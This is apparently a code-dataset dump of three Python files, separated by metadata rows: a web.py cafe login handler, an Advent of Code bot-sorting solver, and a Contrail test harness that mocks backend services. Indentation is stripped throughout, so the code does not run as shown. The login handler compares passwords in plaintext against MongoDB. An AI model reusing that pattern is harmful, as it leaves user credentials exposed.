cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 4"
cuerpo="Descripcion del cafe 4"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
if not login.validates():
log=False
user=''
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
else:
s=web.ctx.session
#buscamos al usuario en la base de datos
conn=pymongo.MongoClient()
db=conn.mydb
usuarios=db.usuarios
us=usuarios.find_one({"user":login['user'].value})
conn.close()
try:
if login['password'].value==us[u'pass']:
log=True
user=login['user'].value
s.usuario=user
else:
log=False
user=''
error='contrasña erronea'
except TypeError:
log=False;
user=''
error='El usuario no existe'
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
| gpl-2.0 | -8,106,485,634,979,966,000 | 29.345161 | 155 | 0.523015 | false |
ImpregnableProgrammer/Advent-of-Code | 2016/Day_10.py | 1 | 2375 | import re
# First Part
def First_Part(s):
Bot_Dict = {}
g=0
s=s.split('\n')
while 1:
p=re.sub('(?<=output )\d+',lambda k:str(-int(k.group(0))-1),s[g%len(s)])
G=re.findall('-?\d+',p)
if p[:3]=='bot' and G[0] in Bot_Dict.keys() and len(Bot_Dict[G[0]])>1:
if sorted(Bot_Dict[G[0]],key=int)==['17','61']:
print(G[0])
break
s.pop(g%len(s))
if G[1] not in Bot_Dict.keys():
Bot_Dict[G[1]]=[]
if G[2] not in Bot_Dict.keys():
Bot_Dict[G[2]]=[]
X=len(Bot_Dict[G[1]])
Y=len(Bot_Dict[G[2]])
Bot_Dict[G[1]]+=(G[1][0]=='-' or (G[1][0]!='-' and X<2)) and [min(Bot_Dict[G[0]],key=int)] or []
Bot_Dict[G[2]]+=(G[2][0]=='-' or (G[2][0]!='-' and Y<2)) and [max(Bot_Dict[G[0]],key=int)] or []
Bot_Dict[G[0]]=(G[1][0]!='-' and X>1) and [min(Bot_Dict[G[0]],key=int)] or (G[2][0]!='-' and Y>1) and [max(Bot_Dict[G[0]],key=int)] or []
elif p[:5]=='value':
s.pop(g%len(s))
if G[1] not in Bot_Dict.keys():
Bot_Dict[G[1]]=[]
Bot_Dict[G[1]]+=len(Bot_Dict[G[1]])<2 and [G[0]] or []
g+=1
# Second Part
def Second_Part(s):
Bot_Dict = {}
g=0
s=s.split('\n')
while 1:
p=re.sub('(?<=output )\d+',lambda k:str(-int(k.group(0))-1),s[g%len(s)])
G=re.findall('-?\d+',p)
if p[:3]=='bot' and G[0] in Bot_Dict.keys() and len(Bot_Dict[G[0]])>1:
s.pop(g%len(s))
if G[1] not in Bot_Dict.keys():
Bot_Dict[G[1]]=[]
if G[2] not in Bot_Dict.keys():
Bot_Dict[G[2]]=[]
X=len(Bot_Dict[G[1]])
Y=len(Bot_Dict[G[2]])
Bot_Dict[G[1]]+=(G[1][0]=='-' or (G[1][0]!='-' and X<2)) and [min(Bot_Dict[G[0]],key=int)] or []
Bot_Dict[G[2]]+=(G[2][0]=='-' or (G[2][0]!='-' and Y<2)) and [max(Bot_Dict[G[0]],key=int)] or []
Bot_Dict[G[0]]=(G[1][0]!='-' and X>1) and [min(Bot_Dict[G[0]],key=int)] or (G[2][0]!='-' and Y>1) and [max(Bot_Dict[G[0]],key=int)] or []
elif p[:5]=='value':
s.pop(g%len(s))
if G[1] not in Bot_Dict.keys():
Bot_Dict[G[1]]=[]
Bot_Dict[G[1]]+=len(Bot_Dict[G[1]])<2 and [G[0]] or []
g+=1
if len(s)<1:
j=1
for o in Bot_Dict.keys():
if 0>int(o)>-4:
j*=int(Bot_Dict[o][0])
print(j)
break
| gpl-3.0 | -5,439,650,238,929,213,000 | 35.538462 | 145 | 0.442526 | false |
rombie/contrail-controller | src/config/common/tests/test_common.py | 1 | 42367 | #
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
import sys
import gevent.monkey
gevent.monkey.patch_all()
import logging
import tempfile
import mock
from pprint import pformat
import coverage
import fixtures
import testtools
from testtools import content
from flexmock import flexmock
from webtest import TestApp
import contextlib
from netaddr import IPNetwork, IPAddress
from vnc_api.vnc_api import *
import kombu
import cfgm_common.zkclient
from cfgm_common.uve.vnc_api.ttypes import VncApiConfigLog
from cfgm_common import vnc_cgitb
from cfgm_common.utils import cgitb_hook
from test_utils import *
import bottle
bottle.catchall=False
import inspect
import novaclient
import novaclient.client
import gevent.pywsgi
import uuid
from pysandesh import sandesh_logger
def lineno():
"""Returns the current line number in our program."""
return inspect.currentframe().f_back.f_lineno
# end lineno
try:
import vnc_cfg_api_server
if not hasattr(vnc_cfg_api_server, 'main'):
from vnc_cfg_api_server import vnc_cfg_api_server
except ImportError:
vnc_cfg_api_server = 'vnc_cfg_api_server could not be imported'
try:
import to_bgp
except ImportError:
try:
from schema_transformer import to_bgp
except ImportError:
to_bgp = 'to_bgp could not be imported'
try:
import svc_monitor
if not hasattr(svc_monitor, 'main'):
from svc_monitor import svc_monitor
except ImportError:
svc_monitor = 'svc_monitor could not be imported'
try:
import device_manager
if hasattr(device_manager, 'DeviceManager'):
import dm_server
else:
from device_manager import dm_server
from device_manager import device_manager
except ImportError:
device_manager = 'device_manager could not be imported'
try:
from kube_manager import kube_manager
if not hasattr(kube_manager, 'main'):
from kube_manager import kube_manager
except ImportError:
kube_manager = 'kube_manager could not be imported'
try:
from mesos_manager import mesos_manager
if not hasattr(mesos_manager, 'main'):
from mesos_manager import mesos_manager
except ImportError:
mesos_manager = 'mesos_manager could not be imported'
def generate_conf_file_contents(conf_sections):
cfg_parser = ConfigParser.RawConfigParser()
for (section, var, val) in conf_sections:
try:
cfg_parser.add_section(section)
except ConfigParser.DuplicateSectionError:
pass
if not var:
continue
if val == '':
cfg_parser.set(section, var, 'empty')
else:
cfg_parser.set(section, var, val)
return cfg_parser
# end generate_conf_file_contents
def generate_logconf_file_contents():
cfg_parser = ConfigParser.RawConfigParser()
cfg_parser.add_section('formatters')
cfg_parser.add_section('formatter_simple')
cfg_parser.set('formatters', 'keys', 'simple')
cfg_parser.set('formatter_simple', 'format', '%(name)s:%(levelname)s: %(message)s')
cfg_parser.add_section('handlers')
cfg_parser.add_section('handler_console')
cfg_parser.add_section('handler_api_server_file')
cfg_parser.set('handlers', 'keys', 'console,api_server_file')
cfg_parser.set('handler_console', 'class', 'StreamHandler')
cfg_parser.set('handler_console', 'level', 'WARN')
cfg_parser.set('handler_console', 'args', '[]')
cfg_parser.set('handler_console', 'formatter', 'simple')
cfg_parser.set('handler_api_server_file', 'class', 'FileHandler')
cfg_parser.set('handler_api_server_file', 'level', 'INFO')
cfg_parser.set('handler_api_server_file', 'formatter', 'simple')
cfg_parser.set('handler_api_server_file', 'args', "('api_server.log',)")
cfg_parser.add_section('loggers')
cfg_parser.add_section('logger_root')
cfg_parser.add_section('logger_FakeWSGIHandler')
cfg_parser.set('loggers', 'keys', 'root,FakeWSGIHandler')
cfg_parser.set('logger_root', 'level', 'WARN')
cfg_parser.set('logger_root', 'handlers', 'console')
cfg_parser.set('logger_FakeWSGIHandler', 'level', 'INFO')
cfg_parser.set('logger_FakeWSGIHandler', 'qualname', 'FakeWSGIHandler')
cfg_parser.set('logger_FakeWSGIHandler', 'handlers', 'api_server_file')
return cfg_parser
# end generate_logconf_file_contents
def launch_kube_manager(test_id, conf_sections, kube_api_skip, event_queue,
vnc_kubernetes_config_dict=None):
args_str = ""
vnc_cgitb.enable(format='text')
wait_for_kube_manager_down()
with tempfile.NamedTemporaryFile() as conf, tempfile.NamedTemporaryFile() as logconf:
cfg_parser = generate_conf_file_contents(conf_sections)
cfg_parser.write(conf)
conf.flush()
cfg_parser = generate_logconf_file_contents()
cfg_parser.write(logconf)
logconf.flush()
args_str= ["-c", conf.name]
kube_manager.main(args_str, kube_api_skip=kube_api_skip,
event_queue=event_queue,
vnc_kubernetes_config_dict=vnc_kubernetes_config_dict)
#end launch_kube_manager
def launch_mesos_manager(test_id, conf_sections, mesos_api_skip, event_queue):
args_str = ""
vnc_cgitb.enable(format='text')
wait_for_mesos_manager_down()
with tempfile.NamedTemporaryFile() as conf, tempfile.NamedTemporaryFile() as logconf:
cfg_parser = generate_conf_file_contents(conf_sections)
cfg_parser.write(conf)
conf.flush()
cfg_parser = generate_logconf_file_contents()
cfg_parser.write(logconf)
logconf.flush()
args_str= ["-c", conf.name]
mesos_manager.main(args_str, mesos_api_skip=mesos_api_skip, event_queue=event_queue)
#end launch_mesos_manager
def retry_exc_handler(tries_remaining, exception, delay):
print >> sys.stderr, "Caught '%s', %d tries remaining, sleeping for %s seconds" % (exception, tries_remaining, delay)
# end retry_exc_handler
def retries(max_tries, delay=1, backoff=2, exceptions=(Exception,), hook=None):
def dec(func):
def f2(*args, **kwargs):
mydelay = delay
tries = range(max_tries)
tries.reverse()
for tries_remaining in tries:
try:
return func(*args, **kwargs)
except exceptions as e:
if tries_remaining > 0:
if hook is not None:
hook(tries_remaining, e, mydelay)
gevent.sleep(mydelay)
mydelay = mydelay * backoff
else:
raise
else:
break
return f2
return dec
# end retries
class VncTestApp(TestApp):
def post_json(self, *args, **kwargs):
resp = super(VncTestApp, self).post_json(*args, **kwargs)
resp.charset = 'UTF-8'
return resp
#end class VncTestApp
def create_api_server_instance(test_id, config_knobs, db='cassandra'):
ret_server_info = {}
allocated_sockets = []
ret_server_info['ip'] = socket.gethostbyname(socket.gethostname())
ret_server_info['service_port'] = get_free_port(allocated_sockets)
ret_server_info['introspect_port'] = get_free_port(allocated_sockets)
ret_server_info['admin_port'] = get_free_port(allocated_sockets)
ret_server_info['allocated_sockets'] = allocated_sockets
if db == "cassandra":
ret_server_info['greenlet'] = gevent.spawn(launch_api_server,
test_id, ret_server_info['ip'], ret_server_info['service_port'],
ret_server_info['introspect_port'], ret_server_info['admin_port'],
config_knobs)
else:
msg = ("Contrail API server does not support database backend "
"'%s'" % db)
raise NotImplementedError(msg)
block_till_port_listened(ret_server_info['ip'],
ret_server_info['service_port'])
extra_env = {'HTTP_HOST': ret_server_info['ip'],
'SERVER_PORT': str(ret_server_info['service_port'])}
api_server_obj = ret_server_info['greenlet'].api_server
ret_server_info['app'] = VncTestApp(api_server_obj.api_bottle,
extra_environ=extra_env)
ret_server_info['api_conn'] = VncApi('u', 'p',
api_server_host=ret_server_info['ip'],
api_server_port=ret_server_info['service_port'])
if FakeNovaClient.vnc_lib is None:
FakeNovaClient.vnc_lib = ret_server_info['api_conn']
ret_server_info['api_session'] = requests.Session()
adapter = requests.adapters.HTTPAdapter()
ret_server_info['api_session'].mount("http://", adapter)
ret_server_info['api_session'].mount("https://", adapter)
ret_server_info['api_server'] = api_server_obj
ret_server_info['api_server']._sandesh.set_logging_level(level="SYS_DEBUG")
return ret_server_info
# end create_api_server_instance
def destroy_api_server_instance(server_info):
server_info['greenlet'].kill()
if hasattr(server_info['api_server']._db_conn, '_msgbus'):
server_info['api_server']._db_conn._msgbus.shutdown()
vhost_url = server_info['api_server']._db_conn._msgbus._urls
FakeKombu.reset(vhost_url)
FakeNovaClient.reset()
CassandraCFs.reset()
FakeKazooClient.reset()
FakeExtensionManager.reset()
for sock in server_info['allocated_sockets']:
sock.close()
# end destroy_api_server_instance
def destroy_api_server_instance_issu(server_info):
server_info['greenlet'].kill()
server_info['api_server']._db_conn._msgbus.shutdown()
vhost_url = server_info['api_server']._db_conn._msgbus._urls
for sock in server_info['allocated_sockets']:
sock.close()
# end destroy_api_server_instance
def launch_api_server(test_id, listen_ip, listen_port, http_server_port,
admin_port, conf_sections):
kombu_mock = mock.Mock()
kombu_patch = mock.patch(
'vnc_cfg_api_server.vnc_cfg_api_server.KombuAmqpClient')
kombu_init_mock = kombu_patch.start()
kombu_init_mock.side_effect = kombu_mock
args_str = ""
args_str = args_str + "--listen_ip_addr %s " % (listen_ip)
args_str = args_str + "--listen_port %s " % (listen_port)
args_str = args_str + "--http_server_port %s " % (http_server_port)
args_str = args_str + "--admin_port %s " % (admin_port)
args_str = args_str + "--cassandra_server_list 0.0.0.0:9160 "
args_str = args_str + "--log_local "
args_str = args_str + "--log_file api_server_%s.log " %(test_id)
args_str = args_str + "--cluster_id %s " %(test_id)
vnc_cgitb.enable(format='text')
with tempfile.NamedTemporaryFile() as conf, \
tempfile.NamedTemporaryFile() as logconf:
cfg_parser = generate_conf_file_contents(conf_sections)
cfg_parser.write(conf)
conf.flush()
cfg_parser = generate_logconf_file_contents()
cfg_parser.write(logconf)
logconf.flush()
args_str = args_str + "--conf_file %s " %(conf.name)
args_str = args_str + "--logging_conf %s " %(logconf.name)
server = vnc_cfg_api_server.VncApiServer(args_str)
gevent.getcurrent().api_server = server
vnc_cfg_api_server.main(args_str, server)
# end launch_api_server
def launch_svc_monitor(cluster_id, test_id, api_server_ip, api_server_port, **extra_args):
allocated_sockets = []
args_str = ""
args_str += "--cluster_id %s " % (cluster_id)
args_str += "--api_server_ip %s " % (api_server_ip)
args_str += "--api_server_port %s " % (api_server_port)
args_str += "--http_server_port %s " % (get_free_port(allocated_sockets))
args_str += "--cassandra_server_list 0.0.0.0:9160 "
args_str += "--log_local "
args_str += "--log_file svc_monitor_%s.log " %(test_id)
args_str += "--trace_file svc_monitor_%s.err " %(test_id)
args_str += "--check_service_interval 2 "
for name, value in extra_args.items():
args_str += "--{name} {value} ".format(name=name, value=value)
svc_monitor.main(args_str)
# end launch_svc_monitor
def kill_svc_monitor(glet):
glet.kill()
svc_monitor.SvcMonitor.reset()
def kill_schema_transformer(glet):
glet.kill()
to_bgp.SchemaTransformer.destroy_instance()
def kill_device_manager(glet):
glet.kill()
dm_server.sigterm_handler()
def kill_kube_manager(glet):
glet.kill()
kube_manager.KubeNetworkManager.destroy_instance()
def kill_mesos_manager(glet):
glet.kill()
mesos_manager.MesosNetworkManager.destroy_instance()
def reinit_schema_transformer():
for obj_cls in to_bgp.DBBaseST.get_obj_type_map().values():
obj_cls.reset()
to_bgp.transformer.reinit()
def launch_schema_transformer(cluster_id, test_id, api_server_ip,
api_server_port, extra_args=None):
allocated_sockets = []
wait_for_schema_transformer_down()
args_str = ""
args_str = args_str + "--cluster_id %s " % (cluster_id)
args_str = args_str + "--api_server_ip %s " % (api_server_ip)
args_str = args_str + "--api_server_port %s " % (api_server_port)
args_str = args_str + "--http_server_port %s " % (get_free_port(allocated_sockets))
args_str = args_str + "--cassandra_server_list 0.0.0.0:9160 "
args_str = args_str + "--log_local "
args_str = args_str + "--log_file schema_transformer_%s.log " %(test_id)
args_str = args_str + "--trace_file schema_transformer_%s.err " %(test_id)
if extra_args:
args_str = args_str + (extra_args)
to_bgp.main(args_str)
# end launch_schema_transformer
def launch_device_manager(test_id, api_server_ip, api_server_port,
conf_sections=None):
kombu_mock = mock.Mock()
kombu_patch = mock.patch(
'device_manager.dm_server.KombuAmqpClient')
kombu_init_mock = kombu_patch.start()
kombu_init_mock.side_effect = kombu_mock
wait_for_device_manager_down()
allocated_sockets = []
args_str = ""
args_str = args_str + "--cluster_id %s " % (test_id)
args_str = args_str + "--api_server_ip %s " % (api_server_ip)
args_str = args_str + "--api_server_port %s " % (api_server_port)
args_str = args_str + "--http_server_port %s " % (get_free_port(allocated_sockets))
args_str = args_str + "--cassandra_server_list 0.0.0.0:9160 "
args_str = args_str + "--log_local "
args_str = args_str + "--log_file device_manager_%s.log " %(test_id)
if conf_sections is not None:
with tempfile.NamedTemporaryFile() as conf:
cfg_parser = generate_conf_file_contents(conf_sections)
cfg_parser.write(conf)
conf.flush()
args_str = args_str + "--conf_file %s " % conf.name
dm_server.main(args_str)
else:
dm_server.main(args_str)
# end launch_device_manager
@retries(5, hook=retry_exc_handler)
def wait_for_schema_transformer_up():
if not to_bgp.SchemaTransformer.get_instance():
raise Exception("ST instance is not up")
@retries(5, hook=retry_exc_handler)
def wait_for_schema_transformer_down():
if to_bgp.SchemaTransformer.get_instance():
raise Exception("ST instance is up, no new instances allowed")
@retries(5, hook=retry_exc_handler)
def wait_for_device_manager_up():
if not device_manager.DeviceManager.get_instance():
raise Exception("DM instance is not up")
@retries(5, hook=retry_exc_handler)
def wait_for_device_manager_down():
if device_manager.DeviceManager.get_instance():
raise Exception("DM instance is up, no new instances allowed")
@retries(5, hook=retry_exc_handler)
def wait_for_kube_manager_up():
if not kube_manager.KubeNetworkManager.get_instance():
raise Exception("KM instance is not up")
@retries(5, hook=retry_exc_handler)
def wait_for_kube_manager_down():
if kube_manager.KubeNetworkManager.get_instance():
raise Exception("KM instance is up, no new instances allowed")
@retries(5, hook=retry_exc_handler)
def wait_for_mesos_manager_up():
if not mesos_manager.MesosNetworkManager.get_instance():
raise Exception("MM instance is not up")
@retries(5, hook=retry_exc_handler)
def wait_for_mesos_manager_down():
if mesos_manager.MesosNetworkManager.get_instance():
raise Exception("MM instance is up, no new instances allowed")
@contextlib.contextmanager
def flexmocks(mocks):
orig_values = {}
try:
for cls, method_name, val in mocks:
kwargs = {method_name: val}
# save orig cls.method_name
orig_values[(cls, method_name)] = getattr(cls, method_name)
flexmock(cls, **kwargs)
yield
finally:
for (cls, method_name), method in orig_values.items():
setattr(cls, method_name, method)
# end flexmocks
def setup_extra_flexmock(mocks):
for (cls, method_name, val) in mocks:
kwargs = {method_name: val}
flexmock(cls, **kwargs)
# end setup_extra_flexmock
def setup_mocks(mod_attr_val_list):
# use setattr instead of flexmock because flexmocks are torndown
# after every test in stopTest whereas these mocks are needed across
# all tests in class
orig_mod_attr_val_list = []
for mod, attr, val in mod_attr_val_list:
orig_mod_attr_val_list.append(
(mod, attr, getattr(mod, attr)))
setattr(mod, attr, val)
return orig_mod_attr_val_list
#end setup_mocks
def teardown_mocks(mod_attr_val_list):
for mod, attr, val in mod_attr_val_list:
setattr(mod, attr, val)
# end teardown_mocks
@contextlib.contextmanager
def patch(target_obj, target_method_name, patched):
orig_method = getattr(target_obj, target_method_name)
def patched_wrapper(*args, **kwargs):
return patched(orig_method, *args, **kwargs)
setattr(target_obj, target_method_name, patched_wrapper)
try:
yield
finally:
setattr(target_obj, target_method_name, orig_method)
#end patch
@contextlib.contextmanager
def patch_imports(imports):
# save original, patch and restore
orig_modules = {}
mocked_modules = []
try:
for import_str, fake in imports:
cur_module = None
for mod_part in import_str.split('.'):
if not cur_module:
cur_module = mod_part
else:
cur_module += "." + mod_part
if cur_module in sys.modules:
orig_modules[cur_module] = sys.modules[cur_module]
else:
mocked_modules.append(cur_module)
sys.modules[cur_module] = fake
yield
finally:
for mod_name, mod in orig_modules.items():
sys.modules[mod_name] = mod
for mod_name in mocked_modules:
del sys.modules[mod_name]
#end patch_import
cov_handle = None
class TestCase(testtools.TestCase, fixtures.TestWithFixtures):
_HTTP_HEADERS = {
'Content-type': 'application/json; charset="UTF-8"',
}
_config_knobs = [
('DEFAULTS', '', ''),
]
mocks = [
(novaclient.client, 'Client', FakeNovaClient.initialize),
(pycassa.system_manager.Connection, '__init__',stub),
(pycassa.system_manager.SystemManager, '__new__',FakeSystemManager),
(pycassa.ConnectionPool, '__new__',FakeConnectionPool),
(pycassa.ColumnFamily, '__new__',FakeCF),
(pycassa.util, 'convert_uuid_to_time',Fake_uuid_to_time),
(kazoo.client.KazooClient, '__new__',FakeKazooClient),
(kazoo.recipe.counter.Counter, '__init__',fake_zk_counter_init),
(kazoo.recipe.counter.Counter, '_change',fake_zk_counter_change),
(kazoo.recipe.counter.Counter, 'value',fake_zk_counter_value),
(kazoo.recipe.counter.Counter, '_ensure_node',
fake_zk_counter_ensure_node),
(kazoo.handlers.gevent.SequentialGeventHandler, '__init__',stub),
(kombu.Connection, '__new__',FakeKombu.Connection),
(kombu.Exchange, '__new__',FakeKombu.Exchange),
(kombu.Queue, '__new__',FakeKombu.Queue),
(kombu.Consumer, '__new__',FakeKombu.Consumer),
(kombu.Producer, '__new__',FakeKombu.Producer),
(VncApiConfigLog, '__new__',FakeApiConfigLog),
]
def __init__(self, *args, **kwargs):
self._logger = logging.getLogger(__name__)
self._assert_till_max_tries = 600
super(TestCase, self).__init__(*args, **kwargs)
self.addOnException(self._add_detailed_traceback)
def _add_detailed_traceback(self, exc_info):
vnc_cgitb.enable(format='text')
from cStringIO import StringIO
tmp_file = StringIO()
cgitb_hook(format="text", file=tmp_file, info=exc_info)
tb_str = tmp_file.getvalue()
tmp_file.close()
self.addDetail('detailed-traceback', content.text_content(tb_str))
def _add_detail(self, detail_str):
frame = inspect.stack()[1]
self.addDetail('%s:%s ' %(frame[1],frame[2]), content.text_content(detail_str))
def _add_request_detail(self, op, url, headers=None, query_params=None,
body=None):
request_str = ' URL: ' + pformat(url) + \
' OPER: ' + pformat(op) + \
' Headers: ' + pformat(headers) + \
' Query Params: ' + pformat(query_params) + \
' Body: ' + pformat(body)
self._add_detail('Requesting: ' + request_str)
def _http_get(self, uri, query_params=None):
url = "http://%s:%s%s" % (self._api_server_ip, self._api_server_port, uri)
self._add_request_detail('GET', url, headers=self._HTTP_HEADERS,
query_params=query_params)
response = self._api_server_session.get(url, headers=self._HTTP_HEADERS,
params=query_params)
self._add_detail('Received Response: ' +
pformat(response.status_code) +
pformat(response.text))
return (response.status_code, response.text)
#end _http_get
def _http_post(self, uri, body):
url = "http://%s:%s%s" % (self._api_server_ip, self._api_server_port, uri)
self._add_request_detail('POST', url, headers=self._HTTP_HEADERS, body=body)
response = self._api_server_session.post(url, data=body,
headers=self._HTTP_HEADERS)
self._add_detail('Received Response: ' +
pformat(response.status_code) +
pformat(response.text))
return (response.status_code, response.text)
#end _http_post
def _http_delete(self, uri, body):
url = "http://%s:%s%s" % (self._api_server_ip, self._api_server_port, uri)
self._add_request_detail('DELETE', url, headers=self._HTTP_HEADERS, body=body)
response = self._api_server_session.delete(url, data=body,
headers=self._HTTP_HEADERS)
self._add_detail('Received Response: ' +
pformat(response.status_code) +
pformat(response.text))
return (response.status_code, response.text)
#end _http_delete
def _http_put(self, uri, body):
url = "http://%s:%s%s" % (self._api_server_ip, self._api_server_port, uri)
self._add_request_detail('PUT', url, headers=self._HTTP_HEADERS, body=body)
response = self._api_server_session.put(url, data=body,
headers=self._HTTP_HEADERS)
self._add_detail('Received Response: ' +
pformat(response.status_code) +
pformat(response.text))
return (response.status_code, response.text)
#end _http_put
def _create_test_objects(self, count=1, proj_obj=None):
ret_objs = []
for i in range(count):
obj_name = self.id() + '-vn-' + str(i)
obj = VirtualNetwork(obj_name, parent_obj=proj_obj)
self._add_detail('creating-object ' + obj_name)
self._vnc_lib.virtual_network_create(obj)
ret_objs.append(obj)
return ret_objs
def _create_test_object(self):
return self._create_test_objects()[0]
def _delete_test_object(self, obj):
self._vnc_lib.virtual_network_delete(id=obj.uuid)
def get_cf(self, keyspace_name, cf_name):
ks_name = '%s_%s' %(self._cluster_id, keyspace_name)
return CassandraCFs.get_cf(ks_name, cf_name)
# end get_cf
def vnc_db_has_ident(self, obj=None, id=None, type_fq_name=None):
if obj:
_type = obj.get_type()
_fq_name = obj.get_fq_name()
if id:
_type = self._vnc_lib.id_to_fq_name_type(id)
_fq_name = self._vnc_lib.id_to_fq_name(id)
if type_fq_name:
_type = type_fq_name[0]
_fq_name = type_fq_name[1]
try:
vnc_obj = self._vnc_lib._object_read(_type, _fq_name)
except NoIdError:
return None
return vnc_obj
def vnc_db_ident_has_prop(self, obj, prop_name, prop_value):
vnc_obj = self.vnc_db_has_ident(obj=obj)
if vnc_obj is None:
return False
return getattr(vnc_obj, prop_name) == prop_value
def vnc_db_ident_has_ref(self, obj, ref_name, ref_fq_name):
vnc_obj = self.vnc_db_has_ident(obj=obj)
if vnc_obj is None:
return False
refs = getattr(vnc_obj, ref_name, [])
for ref in refs:
if ref['to'] == ref_fq_name:
return True
return False
def vnc_db_doesnt_have_ident(self, obj=None, id=None, type_fq_name=None):
return not self.vnc_db_has_ident(obj=obj, id=id,
type_fq_name=type_fq_name)
def vnc_db_ident_doesnt_have_ref(self, obj, ref_name, ref_fq_name=None):
return not self.vnc_db_ident_has_ref(obj, ref_name, ref_fq_name)
def assertTill(self, expr_or_cb, *cb_args, **cb_kwargs):
tries = 0
while True:
if callable(expr_or_cb):
ret = expr_or_cb(*cb_args, **cb_kwargs)
else:
ret = eval(expr_or_cb)
if ret:
break
tries = tries + 1
if tries >= self._assert_till_max_tries:
raise Exception('Max retries')
self._logger.warn('Retrying at ' + str(inspect.stack()[1]))
gevent.sleep(0.1)
@classmethod
def setUpClass(cls, extra_mocks=None, extra_config_knobs=None,
db='cassandra'):
super(TestCase, cls).setUpClass()
global cov_handle
if not cov_handle:
cov_handle = coverage.coverage(source=['./'], omit=['.venv/*'])
#cov_handle.start()
cfgm_common.zkclient.LOG_DIR = './'
gevent.pywsgi.WSGIServer.handler_class = FakeWSGIHandler
cls.orig_mocked_values = setup_mocks(cls.mocks + (extra_mocks or []))
cls._cluster_id = cls.__name__
cls._server_info = create_api_server_instance(
cls._cluster_id, cls._config_knobs + (extra_config_knobs or []),
db=db)
try:
cls._api_server_ip = cls._server_info['ip']
cls._api_server_port = cls._server_info['service_port']
cls._api_admin_port = cls._server_info['admin_port']
cls._api_svr_greenlet = cls._server_info['greenlet']
cls._api_svr_app = cls._server_info['app']
cls._vnc_lib = cls._server_info['api_conn']
cls._api_server_session = cls._server_info['api_session']
cls._api_server = cls._server_info['api_server']
except Exception as e:
cls.tearDownClass()
raise
# end setUpClass
@classmethod
def tearDownClass(cls):
destroy_api_server_instance(cls._server_info)
teardown_mocks(cls.orig_mocked_values)
# end tearDownClass
def setUp(self, extra_mocks=None, extra_config_knobs=None):
self._logger.info("Running %s" %(self.id()))
super(TestCase, self).setUp()
# end setUp
def tearDown(self):
self._logger.info("Finished %s" %(self.id()))
self.wait_till_api_server_idle()
super(TestCase, self).tearDown()
# end tearDown
def wait_till_api_server_idle(self):
# wait for in-flight messages to be processed
if hasattr(self._api_server._db_conn, '_msgbus'):
while self._api_server._db_conn._msgbus.num_pending_messages() > 0:
gevent.sleep(0.001)
vhost_url = self._api_server._db_conn._msgbus._urls
while not FakeKombu.is_empty(vhost_url, 'vnc_config'):
gevent.sleep(0.001)
# wait_till_api_server_idle
def create_virtual_network(self, vn_name, vn_subnet='10.0.0.0/24'):
vn_obj = VirtualNetwork(name=vn_name)
ipam_fq_name = [
'default-domain', 'default-project', 'default-network-ipam']
ipam_obj = self._vnc_lib.network_ipam_read(fq_name=ipam_fq_name)
subnets = [vn_subnet] if isinstance(vn_subnet, basestring) else vn_subnet
subnet_infos = []
for subnet in subnets:
cidr = IPNetwork(subnet)
subnet_infos.append(
IpamSubnetType(
subnet=SubnetType(
str(cidr.network),
int(cidr.prefixlen),
),
default_gateway=str(IPAddress(cidr.last - 1)),
subnet_uuid=str(uuid.uuid4()),
)
)
subnet_data = VnSubnetsType(subnet_infos)
vn_obj.add_network_ipam(ipam_obj, subnet_data)
self._vnc_lib.virtual_network_create(vn_obj)
vn_obj.clear_pending_updates()
return vn_obj
# end create_virtual_network
def _create_service(self, vn_list, si_name, auto_policy,
create_right_port=True, **kwargs):
sa_set = None
if kwargs.get('service_virtualization_type') == 'physical-device':
pr = PhysicalRouter(si_name)
self._vnc_lib.physical_router_create(pr)
sa_set = ServiceApplianceSet('sa_set-'+si_name)
self._vnc_lib.service_appliance_set_create(sa_set)
sa = ServiceAppliance('sa-'+si_name, parent_obj=sa_set)
for if_type, _ in vn_list:
attr = ServiceApplianceInterfaceType(interface_type=if_type)
pi = PhysicalInterface('pi-'+si_name+if_type, parent_obj=pr)
self._vnc_lib.physical_interface_create(pi)
sa.add_physical_interface(pi, attr)
self._vnc_lib.service_appliance_create(sa)
sti = [ServiceTemplateInterfaceType(k) for k, _ in vn_list]
st_prop = ServiceTemplateType(
flavor='medium',
image_name='junk',
ordered_interfaces=True,
interface_type=sti, **kwargs)
service_template = ServiceTemplate(
name=si_name + 'template',
service_template_properties=st_prop)
if sa_set:
service_template.add_service_appliance_set(sa_set)
self._vnc_lib.service_template_create(service_template)
scale_out = ServiceScaleOutType()
if kwargs.get('service_mode') in ['in-network', 'in-network-nat']:
if_list = [ServiceInstanceInterfaceType(virtual_network=vn)
for _, vn in vn_list]
si_props = ServiceInstanceType(auto_policy=auto_policy,
interface_list=if_list,
scale_out=scale_out)
else:
if_list = [ServiceInstanceInterfaceType(),
ServiceInstanceInterfaceType()]
si_props = ServiceInstanceType(interface_list=if_list,
scale_out=scale_out)
service_instance = ServiceInstance(
name=si_name, service_instance_properties=si_props)
service_instance.add_service_template(service_template)
self._vnc_lib.service_instance_create(service_instance)
if kwargs.get('version') == 2:
proj = Project()
pt = PortTuple('pt-'+si_name, parent_obj=service_instance)
self._vnc_lib.port_tuple_create(pt)
for if_type, vn_name in vn_list:
if if_type == 'right' and not create_right_port:
continue
port = VirtualMachineInterface(si_name+if_type, parent_obj=proj)
vmi_props = VirtualMachineInterfacePropertiesType(
service_interface_type=if_type)
vn_obj = self._vnc_lib.virtual_network_read(fq_name_str=vn_name)
port.set_virtual_machine_interface_properties(vmi_props)
port.add_virtual_network(vn_obj)
